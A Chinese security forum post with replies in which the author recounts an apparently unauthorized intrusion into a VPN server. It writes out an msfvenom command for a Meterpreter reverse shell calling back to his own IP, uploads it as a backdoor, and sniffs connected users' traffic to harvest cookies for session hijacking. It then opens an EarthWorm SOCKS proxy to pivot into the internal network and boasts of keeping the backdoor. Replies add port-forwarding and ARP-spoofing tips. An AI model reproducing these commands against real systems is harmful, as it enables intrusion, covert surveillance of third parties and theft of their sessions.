用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    24

    主题

    251

    帖子

    1148

    魔法币
    收听
    0
    粉丝
    65
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2018-4-18 13:39:47 9619315
    本帖最后由 Sp4ce 于 2018-4-20 07:52 编辑

    前言:由于这个VPN节点服务器是之前拿到的,一直没时间做进一步渗透,昨天看到我蛋总表哥发红包,然后我运气爆表抢了个运气王,再加上好久没发文章了,所以就抽空测试下咯。

    0x01 kali反弹shel进行测试

    Kali生成一个payload
    这里生成IP填写的是我外网IP地址
    msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=111.111.111.111 LPORT=8082 -f exe > test.exe

    然后kali进行监听设置
    由于我这里是做了端口映射的,所以填的IP地址就是kali的地址

    当payload运行后,主动连接我的外网地址,然后路由器通过端口映射找到我的kali,然后建立连接。(没有公网服务器的也可以用这个方法)

    把kali生成的后门上传到到对方服务器上运行

    运行后,我们返回kali可以看到已经成功反弹shell

    Netstat-bn查下网络连接信息

    可以看到有几个人连接到1723端口(这个是pptp的拨号端口)
    由于连接信息很多,我们可以用以下命令 过滤出想要的端口信息。
    netstat -n -p tcp |find "1723"

    突然有个想法,既然有人连接到这个VPN服务器,如果我抓取这台服务器的数据包,是否能搞到这些人连上vpn后都干了啥呢?

    0x02 kali进行抓包分析

    说干就干,我们在kali里面进行抓包设置
    首先输入ipconfig /all列出网卡信息
    82579LM这个是他的本地连接的网卡

    然后我们输入use sniffer
    可以看到网卡号82579LM序号为1

    接着输入sniffer_start  1 (开始在序号为1的网卡上抓包)

    然后隔一段时间,我们去下载抓取到的数据包到我们的kali。

    命令:sniffer_dump  1 xpsp1.cap

    下载完以后,在kali主目录下双击打开xpsp1.cap文件。

    但是我发现抓到的数据包里面并没有GET或者POST请求

    如果能抓到GET或者POST请求的话,比如你看到请求里面有cookie,那么我们可以用这个cookie直接登录对方登录过的网站。参考我的上一篇文章【蹭你wifi后 我竟然干了这样的事】

    突然感觉没啥思路了,看来我要拜师学习了。^_^

    0x03 VPN地址给我的灵感

    看到这个ppp的虚拟网卡信息,加上前面抓包看到的172.16.11.7和vpn服务器产生的流量信息,我们可以知道,他的vpn虚拟内网就是172.16.11.0/24

    为了验证我的想法,我们建立一个socks5代理,然后用SocksCap64连上去
    这里用到的工具是EarthWorm,由于这是一台有外网的服务器,我们直接正向代理就可以了。EW使用方法可以参考【对微信卖小电影的一次内网漫游】

    命令如下:

    ew.exe -s ssocksd -l 888

    解释:在服务器上开启一个socks5代理,端口为888

    现在用SocksCap64连上去,把我们的渗透工具放进SocksCap64里面,这样就可以通过这个代理直接搞内网了。
    然后就是你懂的,哈哈^_^

    好可怕,套了这么多层服务器搞事情,你认为就安全了? 然而在第一层的vpn就出卖了你,后面你套10层都没用。

    这么怕自己的信息泄露,那么这是在干啥好事呢?
    大家自行脑补吧……

    还有扫号的,黑产真可怕。

    本来还有很多方法可以进行下一步渗透的,但是最近真的很忙,没时间搞了,抽空维护好后门,以后有的是机会,对吧。哈哈。

    求赞,求赞,求赞,赞我的妹子越来越漂亮,赞我的表哥丁丁增长5cm。٩(๑❛ᴗ❛๑)۶

    用到的工具:链接: https://pan.baidu.com/s/14iv3_H5POejr_enjV0Wv2w
    请勿用于非法用途,一切后果自负。
    密码回复可见

    欢迎大家加入我们的技术交流群一起学习交流哦,i春秋-赵:689194365

    总结:
    一、你以为套个vpn就能很安全的搞事情?对不起,vpn服务器被拿下了,搞你也是分分钟的事。

    二、你以为在虚拟机就安全了?对不起,拿到你虚拟机,然后扫所有内网段,只要虚拟机能访问你本机的局域网,一样可以干掉你。

    三、那么真的就没有其他办法让我们安全的搞事情了吗?,答案肯定是有的,但是方法呢,请自行百度吧,说出来有一定的风险,传播【vpn搭建方法】可是要查水表的,哈哈。


    游客,如果您要查看本帖隐藏内容请回复



    发表于 2018-4-20 07:38:21
    niubility 发表于 2018-4-19 22:53
    既然连接上了第一层vpn,有了nat分配的地址不做代理也可以扫内网了嘛,问下楼主我在该环境下可以使用etterc ...

    不可以,问题就出在这里,我一开始想用的,但是发现和你的问题一样,不能选择vpn的那个虚拟网卡。
    如果选择他本机的那个网卡是抓不到vpn局域网下的流量的。
    使用道具 举报 回复
    jasonx 发表于 2018-4-20 07:38
    不可以,问题就出在这里,我一开始想用的,但是发现和你的问题一样,不能选择vpn的那个虚拟网卡。
    如果选 ...

    就是了,对了, 楼主对路由器方面的漏洞,和利用可有研究?比如通过路由器反弹shell ,通过路由器截取流量等,我说的路由器是带漏洞的tplink,dlinks,网件登
    使用道具 举报 回复
    发表于 2018-4-19 17:23:52
    我准备看看就算了  不说不行  还vpn 了   谷歌云 搭建   http://www.freefq.com/vpn/        你用的kail  还不如用安卓dospibf破解工具箱     
    使用道具 举报 回复
    发表于 2018-4-18 23:39:24
    梦想社 发表于 2018-4-18 19:18
    楼主 如何将虚拟机里面的kali转发成外网呢?

    进你路由器,你会看到一个dmz或者端口映射的功能。

    dmz的话很简单,直接填你kali的IP就行。
    端口转发的话,需要填写你外网进来的端口号,你kali的ip地址和端口号。
    使用道具 举报 回复
    发表于 2018-4-19 11:06:48
    僵尸来了 发表于 2018-4-19 11:01
    可以不过,代理来代理去,看起来好复杂

    当初玩各种正向代理,反向代理,多节串联的时候我也是一脸懵逼,太绕脑子了,等你明白了原理思路就很清晰了。
    使用道具 举报 回复
    三、那么真的就没有其他办法让我们安全的搞事情了吗?,答案肯定是有的,但是方法呢,请自行百度吧,说出来有一定的风险,传播【vpn搭建方法】可是要查水表的,哈哈。
    使用道具 举报 回复
    本帖最后由 niubility 于 2018-4-19 22:57 编辑

    既然连接上了第一层vpn,有了nat分配的地址不做代理也可以扫内网了嘛,问下楼主我在该环境下可以使用ettercap来欺骗吗?我以前测试卡在了不能指定网卡上
    使用道具 举报 回复
    发表于 2018-4-18 17:29:36
    SweetV 发表于 2018-4-18 17:24
    已经能远程桌面了,为啥还要传后门到服务器上呢

    因为远程登录更容易被发现,还有就是用kali反弹回来做很多事情更方便,哈哈。
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩 秦 楚 燕 魏 齐 赵 春秋文阁
    9#
    发表于 2018-4-18 13:41:02
    先抢个沙发,点个赞再好好看
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!投稿请加我QQ:286894635。
    i春秋白帽子军团:451217067
    i春秋-韩:556040588
    i春秋CTF交流学习群:234714762
    使用道具 举报 回复
    发表于 2018-4-18 14:17:04
    先抢个沙发,点个赞再好好看
    使用道具 举报 回复
    发表于 2018-4-18 15:34:34
    感谢分享!
    使用道具 举报 回复
    发表于 2018-4-18 16:00:50
    感谢分享
    使用道具 举报 回复
    发表于 2018-4-18 16:35:00
    还有这种骚操作?
    使用道具 举报 回复
    发表于 2018-4-18 17:24:53
    已经能远程桌面了,为啥还要传后门到服务器上呢
    使用道具 举报 回复
    发表于 2018-4-18 17:26:50

    感谢分享!
    使用道具 举报 回复
    发表于 2018-4-18 17:52:08
    jasonx 发表于 2018-4-18 17:29
    因为远程登录更容易被发现,还有就是用kali反弹回来做很多事情更方便,哈哈。 ...

    厉害,学习到了,谢谢分享
    使用道具 举报 回复
    发表于 2018-4-18 19:18:38
    楼主 如何将虚拟机里面的kali转发成外网呢?
    使用道具 举报 回复
    厉害,学习到了,谢谢分享
    使用道具 举报 回复
    哈哈 好东西  谢谢分享~~
    使用道具 举报 回复
    厉害,大佬
    使用道具 举报 回复
    发表于 2018-4-18 20:26:26
    有点可怕呀,大佬666
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册